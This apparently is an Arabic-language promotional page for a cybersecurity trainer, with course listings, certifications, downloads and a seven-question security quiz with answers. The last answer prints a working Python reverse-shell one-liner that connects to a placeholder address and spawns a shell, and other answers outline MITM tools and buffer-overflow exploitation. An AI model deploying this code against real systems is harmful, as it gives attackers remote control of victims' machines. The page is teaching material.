Abdulmalek Majeed

خبير الأمن السيبراني | مدرب معتمد | باحث أمني

متخصص في اختبار الاختراق والأمن السيبراني مع خبرة واسعة في حماية الأنظمة واكتشاف الثغرات الأمنية. أقدم دورات تدريبية معتمدة وحلول أمنية متكاملة.

Abdulmalek Abdulmalek Abdulmalek Abdulmalek
500+
طالب متدرب
50+
ثغرة مكتشفة
15+
شهادة معتمدة
8+
سنوات خبرة

🎓 الدورات التدريبية

دورات معتمدة في الأمن السيبراني واختبار الاختراق

🔓 الأكثر مبيعاً

الاختراق الأخلاقي المتقدم

تعلم تقنيات الاختراق الأخلاقي واختبار الاختراق من الصفر حتى الاحتراف

  • اختبار الاختراق
  • استغلال الثغرات
  • الهندسة الاجتماعية
احجز الآن
🛡️ جديد

أمن الشبكات المتقدم

حماية الشبكات من الهجمات المتقدمة وتأمين البنية التحتية

  • جدران الحماية
  • كشف التسلل
  • تحليل حركة المرور
احجز الآن
🌐 متقدم

اختراق تطبيقات الويب

اكتشف ثغرات تطبيقات الويب وتعلم كيفية حمايتها

  • SQL Injection
  • XSS Attacks
  • OWASP Top 10
احجز الآن

🎯 تحدي الأمن السيبراني

أجب على 7 أسئلة صعبة واربح دورة مجانية لمدة شهر!

الجائزة

دورة مجانية لمدة شهر كامل

📋 القواعد:

  • أجب على جميع الأسئلة السبعة بشكل صحيح
  • أرسل إجاباتك عبر WhatsApp
  • أول 5 فائزين يحصلون على الجائزة

🔓 تخطي الأسئلة

اكتشف ثغرة في الموقع وتخطى جميع الأسئلة مباشرة!

📊 نتيجتك

0 من 7
1

ما هو الفرق بين هجوم XSS المخزن والمنعكس؟

صعب
الإجابة: XSS المخزن (Stored) يُخزن الكود الخبيث في قاعدة البيانات ويُنفذ عند كل زيارة للصفحة. بينما XSS المنعكس (Reflected) يُنفذ فوراً من خلال رابط ملغم ولا يُخزن. المخزن أخطر لأنه يصيب جميع الزوار.
2

ما هي تقنية SQL Injection من النوع الأعمى (Blind)؟ وكيف تختلف عن النوع العادي؟

صعب
الإجابة: Blind SQLi لا تُظهر نتائج مباشرة، بل تعتمد على استنتاج المعلومات من سلوك التطبيق (True/False responses أو Time-based delays). النوع العادي يُظهر بيانات قاعدة البيانات مباشرة في الصفحة.
3

ما هو هجوم CSRF وكيف يمكن الحماية منه؟

متوسط
الإجابة: CSRF يجبر المستخدم على تنفيذ إجراءات غير مرغوبة في موقع مُصادق عليه. الحماية: استخدام CSRF Tokens، التحقق من Referer Header، استخدام SameSite Cookies، وطلب إعادة المصادقة للعمليات الحساسة.
4

ما هو الفرق بين التشفير المتماثل وغير المتماثل؟ أعط مثالاً لكل منهما.

صعب
الإجابة: المتماثل (Symmetric): مفتاح واحد للتشفير وفك التشفير (مثل AES, DES). غير المتماثل (Asymmetric): مفتاحان - عام للتشفير وخاص لفك التشفير (مثل RSA, ECC). غير المتماثل أبطأ لكن أكثر أماناً لتبادل المفاتيح.
5

ما هو هجوم Man-in-the-Middle؟ وما هي الأدوات المستخدمة لتنفيذه؟

صعب
الإجابة: MITM: المهاجم يعترض الاتصال بين طرفين ويمكنه قراءة/تعديل البيانات. الأدوات: Ettercap, Bettercap, Wireshark, mitmproxy, arpspoof. يتم عبر ARP Spoofing, DNS Spoofing, أو SSL Stripping.
6

ما هي ثغرة Buffer Overflow؟ وكيف يمكن استغلالها للحصول على Shell؟

خبير
الإجابة: Buffer Overflow: كتابة بيانات تتجاوز حجم الذاكرة المخصصة. للاستغلال: تجاوز Return Address بعنوان Shellcode، استخدام NOP Sled للوصول للـ Shellcode، تجاوز حماية ASLR/DEP باستخدام ROP Chains.
7

ما هو Reverse Shell؟ اكتب كود Python بسيط لإنشائه.

خبير
الإجابة: Reverse Shell: الهدف يتصل بالمهاجم (عكس Bind Shell). كود Python:
import socket,subprocess,os; s=socket.socket(); s.connect(("IP",PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])

🔓 اكتشفت ثغرة؟ تخطَّ جميع الأسئلة!

إذا اكتشفت ثغرة أمنية في هذا الموقع، يمكنك الفوز بالدورة المجانية مباشرة دون الإجابة على الأسئلة!

أبلغ عن ثغرة واحصل على الدورة
أرسل إجاباتك عبر WhatsApp

🏆 الشهادات المعتمدة

شهادات دولية معترف بها في مجال الأمن السيبراني

CEH
CEH - Certified Ethical Hacker
EC-Council
CCNA
CCNA Security
Cisco
Security+
CompTIA Security+
CompTIA
OSCP
OSCP - Offensive Security
Offensive Security

📥 التحميلات

تحميل التطبيقات والأدوات

تطبيق الأندرويد

تطبيق السوشيال الخاص بنا للتواصل والمجتمع

تحميل APK

MrRobot Pro

أداة احترافية للأمن السيبراني

تحميل السكربت

📧 تواصل معنا

نحن هنا للإجابة على استفساراتك